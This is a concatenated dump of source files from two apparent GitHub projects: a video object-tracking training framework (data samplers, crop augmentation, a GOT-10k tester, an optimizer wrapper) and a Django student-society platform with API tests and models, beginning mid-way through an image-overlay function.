Numpy Array: Image of the overlay with shape (H, W, 3) and data type
`np.uint8`.
"""
    im, ann = np.asarray(im, dtype=np.uint8), np.asarray(ann, dtype=int)
if im.shape[:-1] != ann.shape:
raise ValueError('First two dimensions of `im` and `ann` must match')
if im.shape[-1] != 3:
        raise ValueError('im must have three channels in the last dimension')
    colors = _pascal_color_map() if colors is None else colors  # avoid ambiguous truth test on arrays
colors = np.asarray(colors, dtype=np.uint8)
mask = colors[ann]
fg = im * alpha + (1 - alpha) * mask
img = im.copy()
img[ann > 0] = fg[ann > 0]
if contour_thickness: # pragma: no cover
import cv2
for obj_id in np.unique(ann[ann > 0]):
contours = cv2.findContours((ann == obj_id).astype(
np.uint8), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)[-2:]
cv2.drawContours(img, contours[0], -1, colors[obj_id].tolist(),
contour_thickness)
return img
```
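A minimal, self-contained sketch of calling `overlay_mask`; the synthetic image and mask below are assumptions for illustration:

```python
import numpy as np

im = np.zeros((64, 64, 3), dtype=np.uint8)
ann = np.zeros((64, 64), dtype=np.int64)
ann[16:48, 16:48] = 1                  # one object with id 1
out = overlay_mask(im, ann, alpha=0.5)
print(out.shape, out.dtype)            # (64, 64, 3) uint8
```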
|
{
"source": "Jee-King/STNet",
"score": 2
}
|
#### File: data/sampler/builder.py
```python
from typing import Dict, List
from yacs.config import CfgNode
from videoanalyst.utils import merge_cfg_into_hps
from ..dataset import builder as dataset_builder
from ..filter import builder as filter_builder
from .sampler_base import TASK_SAMPLERS, DatasetBase
def build(task: str, cfg: CfgNode, seed: int = 0) -> DatasetBase:
r"""
Arguments
---------
task: str
task name (track|vos)
cfg: CfgNode
node name: sampler
seed: int
seed for rng initialization
"""
assert task in TASK_SAMPLERS, "invalid task name"
MODULES = TASK_SAMPLERS[task]
submodules_cfg = cfg.submodules
dataset_cfg = submodules_cfg.dataset
datasets = dataset_builder.build(task, dataset_cfg)
if submodules_cfg.filter.name != "":
filter_cfg = submodules_cfg.filter
data_filter = filter_builder.build(task, filter_cfg)
else:
data_filter = None
name = cfg.name
module = MODULES[name](datasets, seed=seed, data_filter=data_filter)
hps = module.get_hps()
hps = merge_cfg_into_hps(cfg[name], hps)
module.set_hps(hps)
module.update_params()
return module
def get_config(task_list: List) -> Dict[str, CfgNode]:
cfg_dict = {name: CfgNode() for name in task_list}
for cfg_name, modules in TASK_SAMPLERS.items():
cfg = cfg_dict[cfg_name]
cfg["name"] = ""
for name in modules:
cfg[name] = CfgNode()
module = modules[name]
hps = module.default_hyper_params
for hp_name in hps:
cfg[name][hp_name] = hps[hp_name]
cfg["submodules"] = CfgNode()
cfg["submodules"]["dataset"] = dataset_builder.get_config(
task_list)[cfg_name]
cfg["submodules"]["filter"] = filter_builder.get_config(
task_list)[cfg_name]
return cfg_dict
```
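A hedged sketch of driving this builder. The node layout mirrors what `get_config` emits; the sampler name is a hypothetical registered module and the final `build` call is commented out because it needs datasets configured on disk:

```python
# A template, not a runnable recipe: names below are hypothetical.
cfg = get_config(["track", "vos"])["track"]   # default node for the "track" task
cfg["name"] = "TrackPairSampler"              # hypothetical registered sampler
# sampler = build("track", cfg, seed=42)      # needs datasets configured on disk
```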
#### File: transformer/transformer_impl/random_crop_transformer.py
```python
from typing import Dict
from videoanalyst.data.utils.crop_track_pair import crop_track_pair
from ..transformer_base import TRACK_TRANSFORMERS, TransformerBase
@TRACK_TRANSFORMERS.register
class RandomCropTransformer(TransformerBase):
r"""
Cropping training pair with data augmentation (random shift / random scaling)
Hyper-parameters
----------------
context_amount: float
the context factor for template image
max_scale: float
the max scale change ratio for search image
max_shift: float
the max shift change ratio for search image
max_scale_temp: float
the max scale change ratio for template image
max_shift_temp: float
the max shift change ratio for template image
z_size: int
output size of template image
x_size: int
output size of search image
"""
default_hyper_params = dict(
context_amount=0.5,
max_scale=0.3,
max_shift=0.4,
max_scale_temp=0.0,
max_shift_temp=0.0,
z_size=127,
x_size=303,
)
def __init__(self, seed: int = 0) -> None:
super(RandomCropTransformer, self).__init__(seed=seed)
def __call__(self, sampled_data: Dict) -> Dict:
r"""
sampled_data: Dict()
input data
            Dict(data1_pos=Dict(image, anno), data1_neg=Dict(image), data2_pos=Dict(image, anno), data2_neg=Dict(image))
"""
data1_pos = sampled_data["data1_pos"]
data1_neg = sampled_data["data1_neg"]
data2_pos = sampled_data["data2_pos"]
data2_neg = sampled_data["data2_neg"]
im_temp_pos, bbox_temp = data1_pos["image"], data1_pos["anno"]
im_temp_neg = data1_neg['image']
im_curr_pos, bbox_curr = data2_pos["image"], data2_pos["anno"]
im_curr_neg = data2_neg['image']
im_z_pos, im_z_neg, bbox_z, im_x_pos, im_x_neg, bbox_x, _, _ = crop_track_pair(
im_temp_pos,
im_temp_neg,
bbox_temp,
im_curr_pos,
im_curr_neg,
bbox_curr,
config=self._hyper_params,
rng=self._state["rng"])
sampled_data["data1_pos"] = dict(image=im_z_pos, anno=bbox_z)
sampled_data["data1_neg"] = dict(image=im_z_neg, anno=bbox_z)
sampled_data["data2_pos"] = dict(image=im_x_pos, anno=bbox_x)
sampled_data["data2_neg"] = dict(image=im_x_neg, anno=bbox_x)
return sampled_data
```
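A hedged sketch of feeding `RandomCropTransformer`. The image array and the (x1, y1, x2, y2) box format below are assumptions about what `crop_track_pair` expects, so the actual call is left commented:

```python
import numpy as np

transformer = RandomCropTransformer(seed=0)
img = np.zeros((480, 640, 3), dtype=np.uint8)   # placeholder frame
box = np.array([100.0, 120.0, 220.0, 260.0])    # assumed (x1, y1, x2, y2) box
sampled_data = dict(
    data1_pos=dict(image=img, anno=box),
    data1_neg=dict(image=img),
    data2_pos=dict(image=img, anno=box),
    data2_neg=dict(image=img),
)
# out = transformer(sampled_data)  # would yield 127x127 z and 303x303 x crops
```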
#### File: tester/tester_impl/got10k.py
```python
import copy
import os.path as osp
from loguru import logger
import torch
import torch.multiprocessing as mp
from videoanalyst.evaluation.got_benchmark.experiments import ExperimentGOT10k
from ..tester_base import TRACK_TESTERS, TesterBase
from .utils.got_benchmark_helper import PipelineTracker
@TRACK_TESTERS.register
class GOT10kTester(TesterBase):
r"""GOT-10k tester
Hyper-parameters
----------------
device_num: int
number of gpus. If set to non-positive number, then use cpu
data_root: str
path to got-10k root
subsets: List[str]
list of subsets name (val|test)
"""
extra_hyper_params = dict(
device_num=1,
data_root="/data/img_120_split",
subsets=["val"], # (val|test)
)
def __init__(self, *args, **kwargs):
super(GOT10kTester, self).__init__(*args, **kwargs)
# self._experiment = None
def update_params(self):
# set device state
num_gpu = self._hyper_params["device_num"]
if num_gpu > 0:
all_devs = [torch.device("cuda:%d" % i) for i in range(num_gpu)]
            # all_devs = [torch.device("cuda:1")]  # switch device manually
else:
all_devs = [torch.device("cpu")]
self._state["all_devs"] = all_devs
    def test(self):
tracker_name = self._hyper_params["exp_name"]
all_devs = self._state["all_devs"]
nr_devs = len(all_devs)
for subset in self._hyper_params["subsets"]:
root_dir = self._hyper_params["data_root"]
dataset_name = "GOT-Benchmark" # the name of benchmark toolkit, shown under "repo/logs" directory
save_root_dir = osp.join(self._hyper_params["exp_save"],
dataset_name)
result_dir = osp.join(save_root_dir, "result")
report_dir = osp.join(save_root_dir, "report")
experiment = ExperimentGOT10k(root_dir,
subset=subset,
result_dir=result_dir,
report_dir=report_dir)
# single worker
if nr_devs == 1:
dev = all_devs[0]
self._pipeline.set_device(dev)
pipeline_tracker = PipelineTracker(tracker_name, self._pipeline)
experiment.run(pipeline_tracker)
# multi-worker
else:
procs = []
slicing_step = 1.0 / nr_devs
for dev_id, dev in enumerate(all_devs):
slicing_quantile = (slicing_step * dev_id,
slicing_step * (dev_id + 1))
proc = mp.Process(target=self.worker,
args=(dev_id, dev, subset,
slicing_quantile))
proc.start()
procs.append(proc)
for p in procs:
p.join()
            # evaluate
performance = experiment.report([tracker_name], plot_curves=False)
test_result_dict = dict()
if performance is not None:
test_result_dict["main_performance"] = performance[tracker_name][
"overall"]["ao"]
else:
test_result_dict["main_performance"] = -1
return test_result_dict
def worker(self, dev_id, dev, subset, slicing_quantile):
self.set_random_seed()
logger.debug("Worker starts: slice {} at {}".format(
slicing_quantile, dev))
tracker_name = self._hyper_params["exp_name"]
pipeline = self._pipeline
pipeline.set_device(dev)
pipeline_tracker = PipelineTracker(tracker_name, pipeline)
root_dir = self._hyper_params["data_root"]
dataset_name = "GOT-Benchmark" # the name of benchmark toolkit, shown under "repo/logs" directory
save_root_dir = osp.join(self._hyper_params["exp_save"], dataset_name)
result_dir = osp.join(save_root_dir, "result")
report_dir = osp.join(save_root_dir, "report")
experiment = ExperimentGOT10k(root_dir,
subset=subset,
result_dir=result_dir,
report_dir=report_dir)
experiment.run(pipeline_tracker, slicing_quantile=slicing_quantile)
logger.debug("Worker ends: slice {} at {}".format(
slicing_quantile, dev))
GOT10kTester.default_hyper_params = copy.deepcopy(
GOT10kTester.default_hyper_params)
GOT10kTester.default_hyper_params.update(GOT10kTester.extra_hyper_params)
```
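The multi-worker branch of `test` splits the benchmark by quantile rather than by explicit sequence indices; the slices produced for an assumed four-device setup look like this:

```python
nr_devs = 4
slicing_step = 1.0 / nr_devs
slices = [(slicing_step * i, slicing_step * (i + 1)) for i in range(nr_devs)]
print(slices)  # [(0.0, 0.25), (0.25, 0.5), (0.5, 0.75), (0.75, 1.0)]
```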
#### File: optim/optimizer/optimizer_base.py
```python
from abc import ABCMeta
from typing import Dict
from loguru import logger
from yacs.config import CfgNode
import torch
from torch import nn
from videoanalyst.utils import Registry
from .optimizer_impl.utils.lr_multiply import build as build_lr_multiplier
from .optimizer_impl.utils.lr_policy import build as build_lr_policy
from .optimizer_impl.utils.lr_policy import schedule_lr
OPTIMIZERS = Registry('OPTIMIZERS')
class OptimizerBase:
__metaclass__ = ABCMeta
r"""
    base class for Optimizer. Responsible for wrapping the underlying torch optimizer and for scheduling its learning rate.
Define your hyper-parameters here in your sub-class.
"""
default_hyper_params = dict(
minibatch=1,
nr_image_per_epoch=1,
lr_policy=[],
lr_multiplier=[],
amp=False,
)
def __init__(self, cfg: CfgNode, model: nn.Module) -> None:
r"""
        Optimizer wrapper, responsible for learning-rate scheduling and (optional) gradient modification
Arguments
---------
cfg: CfgNode
node name: optimizer
Internal members
----------------
_model:
underlying nn.Module
_optimizer
underlying optim.optimizer.optimizer_base.OptimizerBase
_scheduler:
underlying scheduler
_param_groups_divider: function
divide parameter for partial scheduling of learning rate
input: nn.Module
output: List[Dict], k-v: 'params': nn.Parameter
"""
        self._hyper_params = dict(self.default_hyper_params)  # copy so the shared class defaults are not mutated
self._state = dict()
self._cfg = cfg
self._model = model
self._optimizer = None
self._grad_modifier = None
self.grad_scaler = None
def get_hps(self) -> dict:
r"""
Getter function for hyper-parameters
Returns
-------
dict
hyper-parameters
"""
return self._hyper_params
def set_hps(self, hps: dict) -> None:
r"""
Set hyper-parameters
Arguments
---------
hps: dict
            dict of hyper-parameters; the keys must be in self._hyper_params
"""
for key in hps:
if key not in self._hyper_params:
raise KeyError
self._hyper_params[key] = hps[key]
def update_params(self) -> None:
r"""
        an interface for updating derived parameters (iteration count, lr policy, lr multiplier, amp)
"""
# calculate & update iteration number
self._hyper_params["num_iterations"] = self._hyper_params[
"nr_image_per_epoch"] // self._hyper_params["minibatch"]
# lr_policy
lr_policy_cfg = self._hyper_params["lr_policy"]
if len(lr_policy_cfg) > 0:
lr_policy = build_lr_policy(
lr_policy_cfg, max_iter=self._hyper_params["num_iterations"])
self._state["lr_policy"] = lr_policy
# lr_multiplier
lr_multiplier_cfg = self._hyper_params["lr_multiplier"]
if len(lr_multiplier_cfg) > 0:
lr_multiplier = build_lr_multiplier(lr_multiplier_cfg)
self._state["lr_multiplier"] = lr_multiplier
if "lr_multiplier" in self._state:
params = self._state["lr_multiplier"].divide_into_param_groups(
self._model)
else:
params = self._model.parameters()
self._state["params"] = params
# mix precision
if self._hyper_params["amp"]:
try:
self.grad_scaler = torch.cuda.amp.GradScaler()
            except AttributeError:
                logger.error(
                    "mixed precision training is only supported on torch >= 1.6")
                exit()
            logger.info("enable automatic mixed precision training")
def set_grad_modifier(self, grad_modifier):
self._grad_modifier = grad_modifier
def zero_grad(self):
self._optimizer.zero_grad()
def step(self):
if self.grad_scaler is not None:
self.grad_scaler.step(self._optimizer)
self.grad_scaler.update()
else:
self._optimizer.step()
def state_dict(self):
return self._optimizer.state_dict()
def load_state_dict(self, state_dict):
self._optimizer.load_state_dict(state_dict)
def schedule(self, epoch: int, iteration: int) -> Dict:
r"""
an interface for optimizer scheduling (e.g. adjust learning rate)
        self.set_scheduler needs to be called during the initialization phase
"""
schedule_info = dict()
if "lr_policy" in self._state:
lr = self._state["lr_policy"].get_lr(epoch, iteration)
schedule_lr(self._optimizer, lr)
schedule_info["lr"] = lr
# apply learning rate multiplication
if "lr_multiplier" in self._state:
self._state["lr_multiplier"].multiply_lr(self._optimizer)
return schedule_info
def modify_grad(self, epoch, iteration=-1):
if self._grad_modifier is not None:
self._grad_modifier.modify_grad(self._model, epoch, iteration)
```
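The only quantity `update_params` derives directly is the per-epoch iteration count, by integer division of the two counters in `default_hyper_params`; a worked example with assumed values:

```python
nr_image_per_epoch = 600000
minibatch = 32
num_iterations = nr_image_per_epoch // minibatch
print(num_iterations)  # 18750
```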
|
{
"source": "JeekStudio/StudentPlatform",
"score": 3
}
|
#### File: StudentPlatform/account/tests.py
```python
from rest_framework.test import APIClient
from testing.testcases import TestCase
# Create your tests here.
class AccountTests(TestCase):
def setUp(self):
self.user = self.createUser('ncjxjj')
def test_login(self):
url = '/api/account/login/'
data = {
'username': 'ncjxjj',
'password': '<PASSWORD>'
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, 200)
data = {
'username123': 'ncjxjadaj',
'passwo123rd': '<PASSWORD>'
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, 400)
data = {
'username': 'ncjdjj',
'password': '<PASSWORD>'
}
response = self.client.post(url, data)
self.assertEqual(response.status_code, 406)
def test_logout(self):
url = '/api/account/logout/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user)
response = client.post(url)
self.assertEqual(response.status_code, 200)
def test_change_password(self):
user = self.createUser(username='ncj')
data = {
'old_password': '<PASSWORD>',
'new_password': '<PASSWORD>'
}
url = '/api/account/change_password/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(user)
response = client.post(url, data=data, decode=False)
self.assertEqual(response.status_code, 202)
def test_change_password_with_incorrect_old_password(self):
user = self.createUser(username='ncj')
data = {
'old_password': '<PASSWORD>',
'new_password': '<PASSWORD>'
}
url = '/api/account/change_password/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(user)
response = client.post(url, data=data, decode=False)
self.assertEqual(response.status_code, 400)
self.assertEqual(response.data['detail'], '原密码错误')
def test_change_password_with_invalid_form(self):
user = self.createUser(username='ncj')
data = {
'old_password23': '<PASSWORD>',
'new_password1': '<PASSWORD>'
}
url = '/api/account/change_password/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(user)
response = client.post(url, data=data, decode=False)
self.assertEqual(response.status_code, 400)
self.assertEqual(response.data['detail'], '表单填写错误')
def test_retrieve_user_identity(self):
student_user = self.createUser('smsnb')
self.createStudent(student_user)
society_user = self.createUser('tjwnb')
self.createSociety(user=society_user, society_id=101, members=None)
sb_user = self.createUser('ncjnb')
self.createSocietyBureau(sb_user)
url = '/api/account/user/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user)
res = client.get(url)
self.assertEqual(res.data['identity']['identity'], 'who are u?')
client.force_authenticate(student_user)
res = client.get(url)
self.assertEqual(res.data['identity']['identity'], 'student')
client.force_authenticate(society_user)
res = client.get(url)
self.assertEqual(res.data['identity']['identity'], 'society')
client.force_authenticate(sb_user)
res = client.get(url)
self.assertEqual(res.data['identity']['identity'], 'society_bureau')
res = self.client.get(url)
self.assertEqual(res.status_code, 403)
def test_password_changed(self):
url = '/api/account/user/'
user1 = self.createUser('123')
user1.set_password('<PASSWORD>')
user1.save()
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(user1)
response = client.get(url, encode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['password_changed'], False)
user1.set_password('<PASSWORD>')
user1.save()
response = client.get(url, encode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['password_changed'], True)
```
#### File: society_bureau/api/services.py
```python
import json
from django.utils import timezone
from society_bureau.models import SiteSettings
# Singleton Pattern
class SettingsService:
@classmethod
def get_instance(cls):
default_settings = json.dumps({
'year': timezone.datetime.now().year,
'semester': 1
})
settings = SiteSettings.objects.all().first()
if settings is None:
return SiteSettings.objects.create(settings=default_settings)
return settings
@classmethod
def get_dict(cls):
settings = cls.get_instance()
return json.loads(settings.settings)
@classmethod
def get(cls, key):
settings = cls.get_instance()
return json.loads(settings.settings).get(key, None)
@classmethod
def update(cls, encoded_json):
        settings = cls.get_instance()  # guards against a missing settings row
settings.settings = encoded_json
settings.save()
@classmethod
def set(cls, key, value):
settings_content = cls.get_dict()
settings_content[key] = value
cls.update(json.dumps(settings_content))
```
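A minimal usage sketch for `SettingsService`, assuming a migrated Django database so the `SiteSettings` row can be lazily created:

```python
# Lazily creates the singleton row on first access.
current = SettingsService.get_dict()       # e.g. {'year': 2024, 'semester': 1}
SettingsService.set('semester', 2)         # read-modify-write the JSON blob
print(SettingsService.get('semester'))     # 2
```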
#### File: society_bureau/api/tests.py
```python
from rest_framework.test import APIClient
from testing.testcases import TestCase
from society.constants import SocietyType, SocietyStatus
from society_manage.models import CreditDistribution
from society.models import Society
from society_bureau.api.services import SettingsService
import json
class DashboardTests(TestCase):
pass
class SocietyManageTests(TestCase):
def setUp(self):
self.user1 = self.createUser('society1')
self.user2 = self.createUser('society2')
self.user3 = self.createUser('society3')
self.user4 = self.createUser('society_bureau')
self.society1 = self.createSociety(
user=self.user1,
name='jeek',
members=None,
society_type=SocietyType.HUMANISTIC
)
self.society2 = self.createSociety(
user=self.user2,
society_id=301,
name='jeek2',
members=None,
society_type=SocietyType.SCIENTIFIC,
status=SocietyStatus.ARCHIVED
)
self.society3 = self.createSociety(
user=self.user3,
society_id=501,
name='jtv',
members=None,
society_type=SocietyType.LEADERSHIP,
status=SocietyStatus.ACTIVE
)
self.society_bureau = self.createSocietyBureau(user=self.user4, real_name='xxx')
def test_retrieve_society(self):
url = '/api/manage/society/{}/'.format(self.society2.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.user4)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['society_id'], 301)
self.assertEqual(response.data['name'], 'jeek2')
self.assertEqual(response.data['type'], SocietyType.SCIENTIFIC)
def test_list_societies(self):
url = '/api/manage/society/'
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.user4)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 3)
data = {
'name': 'jee'
}
response = client.get(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
data = {
'type': SocietyType.LEADERSHIP
}
response = client.get(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['name'], 'jtv')
data = {
'status': SocietyStatus.ACTIVE
}
response = client.get(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
self.assertEqual(response.data['results'][0]['name'], 'jtv')
def test_list_pagination_societies(self):
users = [self.createUser('society{}'.format(i)) for i in range(4, 51)]
societies = [
self.createSociety(
user=user,
society_id=user.id - 1,
name=user.username,
members=None
) for user in users
]
url = '/api/manage/society/'
data = {
'page': 2,
'page_size': 20
}
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
# default page_size = 10
client.force_authenticate(self.user4)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 10)
self.assertEqual(response.data['results'][0]['id'], 1)
# set page and page_size manually
response = client.get(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 20)
self.assertEqual(response.data['results'][0]['id'], 21)
# max page_size = 50
data = {
'page': 1,
'page_size': 50
}
response = client.get(url, data=data, decode=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 40)
self.assertEqual(response.data['count'], 50)
self.assertEqual(response.data['results'][-1]['id'], 40)
def test_confirm_society(self):
url = '/api/manage/society/{}/confirm/'.format(self.society3.pk)
data = {
'id': self.society3.pk,
'society_id': 401
}
client = APIClient(enforce_csrf_checks=True)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.user4)
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 403)
url = '/api/manage/society/{}/confirm/'.format(self.society1.pk)
data = {
'id': self.society1.pk,
'society_id': 301
}
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 400)
data = {
'id': self.society1.pk,
'society_id': ''
}
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 202)
self.society1.refresh_from_db()
self.assertEqual(self.society1.society_id, 401)
self.assertEqual(self.society1.status, SocietyStatus.ACTIVE)
def test_archive_society(self):
credit = CreditDistribution.objects.create(
society=self.society3,
year=SettingsService.get('year'),
semester=SettingsService.get('semester'),
credit=10,
open=True
)
student_user = self.createUser('student')
student = self.createStudent(user=student_user)
credit.receivers.add(student)
self.society3.members.add(student)
url = '/api/manage/society/{}/archive/'.format(self.society1.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.post(url, decode=True)
self.assertEqual(response.status_code, 403)
# test with a waiting society
url = '/api/manage/society/{}/archive/'.format(self.society1.pk)
client.force_authenticate(self.user4)
response = client.post(url, decode=True)
self.assertEqual(response.status_code, 403)
url = '/api/manage/society/{}/archive/'.format(self.society3.pk)
response = client.post(url, decode=True)
self.society3.refresh_from_db()
self.assertEqual(response.status_code, 202)
self.assertIsNone(self.society3.society_id)
self.assertEqual(self.society3.status, SocietyStatus.ARCHIVED)
self.assertEqual(self.society3.user.is_active, False)
self.assertNotIn(student, self.society3.members.all())
self.assertNotIn(student, credit.receivers.all())
def test_destroy_society(self):
url = '/api/manage/society/{}/'.format(self.society3.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 403)
# test with an active society
client.force_authenticate(self.user4)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 403)
url = '/api/manage/society/{}/'.format(self.society2.pk)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 204)
self.assertIsNone(Society.objects.filter(pk=self.society2.pk).first())
def test_export_societies(self):
url = '/api/manage/society/export/'
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user4)
response = client.post(url, decode=True)
self.assertEqual(response.status_code, 200)
        self.assertEqual(
response.get('Content-Disposition'),
'attachment; filename="export.xlsx"'
)
class CreditReceiversTests(TestCase):
def setUp(self):
self.user1 = self.createUser('society1')
self.user2 = self.createUser('society2')
self.user3 = self.createUser('society_bureau')
self.user4 = self.createUser('student')
self.society1 = self.createSociety(
user=self.user1,
society_id=401,
name='jeek',
members=None,
society_type=SocietyType.HUMANISTIC
)
self.society1.status = SocietyStatus.ACTIVE
self.society1.save()
self.society2 = self.createSociety(
user=self.user2,
society_id=301,
name='jtv',
members=None,
society_type=SocietyType.SCIENTIFIC
)
self.society2.status = SocietyStatus.ACTIVE
self.society2.save()
self.society_bureau = self.createSocietyBureau(user=self.user3, real_name='xxx')
self.student = self.createStudent(user=self.user4)
def test_list_credit_distributions(self):
url = '/api/manage/credit/?year={year}&semester={semester}'.format(
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
# test permissions
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.user3)
res = client.get(url, decode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['count'], 0)
CreditDistribution.objects.create(
society=self.society1,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
CreditDistribution.objects.create(
society=self.society2,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
res = client.get(url, decode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['count'], 2)
def test_retrieve_credit_distribution(self):
credit_distribution = CreditDistribution.objects.create(
society=self.society1,
year=2019,
semester=1,
)
credit_distribution.receivers.add(self.student)
url = '/api/manage/credit/{}/'.format(credit_distribution.pk)
client = APIClient(enforce_csrf_checks=True)
response = client.get(url, decode=True)
self.assertEqual(response.status_code, 403)
client.force_authenticate(self.user3)
response = client.get(url, decode=True)
self.assertEqual(response.data['society']['society_id'], self.society1.society_id)
self.assertEqual(response.data['year'], credit_distribution.year)
self.assertEqual(response.data['semester'], credit_distribution.semester)
self.assertEqual(len(response.data['receivers']), 1)
self.assertEqual(response.data['receivers'][0]['name'], self.student.name)
def test_manual_create_credit_distribution(self):
url = '/api/manage/credit/manual_create/'
data = {
'society_id_set': [401, 301],
'year': SettingsService.get('year'),
'semester': SettingsService.get('semester'),
'credit': 20
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
response = client.post(url, data=json.dumps(data), content_type='application/json')
self.assertEqual(response.status_code, 201)
cd_set = CreditDistribution.objects.filter(
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
self.assertEqual(cd_set[0].society, self.society1)
self.assertEqual(cd_set[1].society, self.society2)
self.assertEqual(cd_set[0].credit, 20)
# test create again
# the response status code should be 400
# because of the unique together validator
response = client.post(url, data=data, decode=True)
self.assertEqual(response.status_code, 400)
def test_update_credit_distribution(self):
cd = CreditDistribution.objects.create(
society=self.society1,
year=2017,
semester=1,
open=False
)
url = '/api/manage/credit/{}/'.format(cd.pk)
data = {
'open': True,
'credit': 10
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.patch(url, data=data, decode=True)
self.assertEqual(res.status_code, 200)
cd.refresh_from_db()
self.assertEqual(cd.open, True)
self.assertEqual(cd.credit, 10)
def test_bulk_create(self):
url = '/api/manage/credit/bulk_create/'
data = {
'year': SettingsService.get('year'),
'semester': 2
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 201)
CreditDistribution.objects.first().delete()
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 201)
self.assertEqual(CreditDistribution.objects.count(), 2)
data = {
'yea': 1110,
'semester': 2
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 400)
def test_bulk_close(self):
CreditDistribution.objects.create(
society=self.society1,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
CreditDistribution.objects.create(
society=self.society2,
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
)
url = '/api/manage/credit/bulk_close/'
data = {
'year': SettingsService.get('year'),
'semester': SettingsService.get('semester')
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(CreditDistribution.objects.filter(
year=SettingsService.get('year'),
semester=SettingsService.get('semester')
).first().open, False)
data = {
'year': 1110,
'semester': 2
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 404)
data = {
'yea': 1110,
'semestr': 2
}
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
res = client.post(url, data=data, decode=True)
self.assertEqual(res.status_code, 400)
def test_destroy(self):
credit_distribution = CreditDistribution.objects.create(
society=self.society1,
year=2020,
semester=1,
)
url = '/api/manage/credit/{}/'.format(credit_distribution.pk)
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user3)
response = client.delete(url, decode=True)
self.assertEqual(response.status_code, 204)
class SiteSettingsTest(TestCase):
def setUp(self):
self.user = self.createUser('sb1')
self.createSocietyBureau(user=self.user)
client = APIClient(enforce_csrf_checks=True)
client.force_authenticate(self.user)
self.client = client
def test_retrieve(self):
url = '/api/manage/settings/'
res = self.client.get(url, encode=True)
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data['year'], SettingsService.get('year'))
self.assertEqual(res.data['semester'], SettingsService.get('semester'))
def test_update(self):
url = '/api/manage/settings/'
res = self.client.put(url, data={'year': 2011, 'semester': 2})
self.assertEqual(res.status_code, 202)
res = self.client.put(url, data={'yea': 2011, 'semester': 2})
self.assertEqual(res.status_code, 400)
```
#### File: StudentPlatform/society_bureau/models.py
```python
from django.db import models
from django.contrib.auth.models import User
from student.models import Student
class SocietyBureau(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='society_bureau')
real_name = models.CharField(max_length=64)
qq = models.CharField(max_length=32, blank=True)
phone = models.CharField(max_length=32, blank=True)
email = models.EmailField(blank=True)
password_changed = models.BooleanField(default=False)
def __str__(self):
return self.real_name
class SiteSettings(models.Model):
settings = models.TextField()
```
#### File: society_manage/api/tests.py
```python
import os, json
from PIL import Image, ImageChops
from rest_framework.test import APIClient
from django.utils import timezone
from testing.testcases import TestCase
from society.constants import SocietyType, SocietyStatus, JoinSocietyRequestStatus, ActivityRequestStatus
from society.models import JoinSocietyRequest, ActivityRequest
from society_manage.models import CreditDistribution
from society_bureau.api.services import SettingsService
from society.constants import TEST_FILE_PATH
class SocietyManageMemberTests(TestCase):
